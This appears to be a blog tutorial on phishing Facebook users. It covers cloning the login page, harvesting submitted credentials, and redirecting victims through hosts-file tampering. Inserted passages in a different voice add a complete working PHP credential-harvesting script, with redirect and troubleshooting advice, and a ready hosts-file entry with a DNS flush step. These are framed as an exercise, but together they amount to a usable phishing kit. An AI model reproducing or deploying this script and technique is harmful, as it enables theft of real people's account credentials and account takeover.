Monday, April 2, 2018

Phishing (I) - Local redirection and Remote hosts file manipulation


- Layout for this exercise:


1 - Introduction

- Phishing is the attempt to obtain sensitive information such as usernames, passwords, or credit card details for malicious reasons by disguising as a trustworthy entity in an electronic communication.

- The word is a neologism created as a homophone of fishing due to the similarity of using a bait in an attempt to catch a victim. 

- Phishing is typically carried out by email spoofing or instant messaging, and it often directs users to enter personal information at a fake website whose look and feel are identical to the legitimate one; the only visible difference is the URL of the site the user is actually connected to.

- Phishing is an example of social engineering techniques used to deceive users, and exploits weaknesses in current web security.

- Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.

2 - Creating a fake web page

- The goal of this exercise is to create a fake web page identical to the Facebook home page

- The victim will connect to the fake page believing that he is connected to the real Facebook home page, and he will enter his credentials (email/password) innocently.

- The attacker will capture the submitted credentials into a log file of his choosing (log.txt), so that he can take them over and make malicious use of them.

- Of course, this exercise could be extended to any type of website, such as social networks, banking, insurance, business, etc ...

- First of all, let's backup all the XAMPP files (xampp/htdocs from the attacker machine Windows 10) to a safe place, because we are going to replace it with a new web content:

- Now, with the Facebook home page open in the browser (Firefox in this case), let's click Save Page and download the whole web page to the folder xampp/htdocs of the attacker machine Windows 10:

- Renaming the downloaded content to index.html, this will be the home page of the fake website:

- Now, the attacker Windows 10 holds a copy of the Facebook home page at its xampp/htdocs folder:

3 - Local redirection

- Then, the attacker writes the file mail.php (storing it at xampp/htdocs), whose purpose is to write any user input submitted by the form to the text file log.txt:

- Let's notice the line where log.txt is open and created:

- Opening index.html with Notepad:

- Finding action= in the login form, the original action is replaced with action="mail.php", so that the submitted fields are posted to mail.php, which writes them to the text file log.txt:

- Now, let's try the fake web page and the bait locally, browsing to localhost and entering some test credentials, for instance:
password: passwordforjohndoe

- A new log.txt is created immediately, where we can find the test credentials successfully harvested:
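The post only shows mail.php as a screenshot, so here is an added example of what such a harvesting script looks like (it is not the original post's script). It assumes it sits beside index.html in xampp/htdocs, that the saved form now has action="mail.php" with method="post" (the Facebook login form posts its fields), and that the victim should be bounced to the real site afterwards; the redirect URL and the record format are assumptions, and the field names are not hard-coded because the page only says "any user input" is captured.

```php
<?php
// mail.php: added example, not the original post's script (which was shown
// only as a screenshot). Assumes it is stored next to index.html in
// xampp/htdocs and that index.html's form has action="mail.php" and
// method="post".

// Harvest file, relative to this script (log.txt, as on the page).
$logFile = __DIR__ . DIRECTORY_SEPARATOR . 'log.txt';

// Where the victim is sent afterwards, so the "failed" login looks like an
// ordinary retry on the real site. The destination URL is an assumption.
$redirectTo = 'https://www.facebook.com/';

// One record per submission: timestamp and the submitting client's address.
$entry = '[' . date('c') . '] from ' . ($_SERVER['REMOTE_ADDR'] ?? 'unknown') . PHP_EOL;

// Log every submitted field rather than hard-coding names such as "email"
// or "pass", since the page only states that "any user input" is captured.
foreach ($_POST as $name => $value) {
    $value = is_array($value) ? json_encode($value) : (string) $value;
    // Collapse newlines so a crafted value cannot forge extra log records.
    $value = str_replace(["\r", "\n"], ' ', $value);
    $entry .= '    ' . $name . ': ' . $value . PHP_EOL;
}

// FILE_APPEND creates log.txt on first use (the "new log.txt" the page
// mentions); LOCK_EX keeps two concurrent submissions from interleaving.
file_put_contents($logFile, $entry, FILE_APPEND | LOCK_EX);

// Hand the victim over to the real site and stop.
header('Location: ' . $redirectTo, true, 302);
exit;
```

Two practical notes: if the saved form used method="get", $_POST would be empty and nothing would be logged, so check the form's method attribute when the log stays empty; and because log.txt lives inside the web root, anyone who guesses its name can download the harvested credentials directly, which is both an operational risk for the attacker and a useful indicator for whoever finds such a site.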

4 - Remote Hosts file manipulation

- To test that the fake web page works remotely, let's connect the victim Windows 7 to the attacker's IP, enter some credentials, and finally check that the attacker is again able to harvest a remote user's credentials:

- Now we have achieved a greater degree of effectiveness in the attack, because we have harvested the victim's credentials remotely, not just locally.

- However, this scenario as described so far is unlikely to happen in the real world, because a normal connection from the victim to the Facebook hostname would resolve to the real Facebook home page, not to the attacker's IP.

- How to achieve that the victim connects to the fake web page instead of the real one?

- The answer is Hosts file manipulation.

- The plain-text hosts file maps hostnames to IP addresses. Each line consists of an IP address in the first field followed by one or more hostnames, with the fields separated by whitespace.

- The hosts file assists in addressing nodes in a computer network, translating human-friendly hostnames into the numeric IP addresses that identify and locate a host in a network.

- The other, and usual, mechanism for the same task is the well-known Domain Name System (DNS); on Windows the hosts file is consulted before any DNS query is sent, so a hosts entry overrides the DNS answer.

- Unlike remote DNS resolvers, the hosts file is under the direct control of the local computer's administrator, so an attacker who has gained administrative access to the victim can manipulate it remotely, for instance as part of a post-exploitation process.

- Some examples of altering files remotely during post-exploitation of a system:

- So, taking for granted that the attacker is able to alter files remotely (once the victim's machine has been exploited), let's open the hosts file at this path:

C:\Windows\System32\drivers\etc\hosts

- Adding a new line that maliciously maps the Facebook hostname to the attacker's IP:
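As an added illustration (not a screenshot from the original post), the injected entry follows the format described above, one IP address and then the hostnames to hijack; the attacker address 192.168.1.10 is a placeholder, not the address used in the exercise:

```text
# C:\Windows\System32\drivers\etc\hosts on the victim Windows 7
# (added example; 192.168.1.10 is a placeholder for the attacker's IP)
192.168.1.10    www.facebook.com facebook.com
```

The hostname must match exactly what the victim types, so both the bare and the www form are listed; Windows picks the change up immediately, but running ipconfig /flushdns afterwards makes sure no cached DNS answer is used instead.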

- Now, when the victim Windows 7 connects to the Facebook hostname, the attacker is again able to harvest the remote user's credentials.

- The explanation is that the modified hosts file on the victim machine resolves the hostname to the attacker's IP (where the fake web page is served) instead of to the real Facebook home page. Note that this only works while the victim reaches the fake page over plain HTTP: an HTTPS request to the same hostname would fail certificate validation, and HSTS would prevent the browser from falling back to HTTP.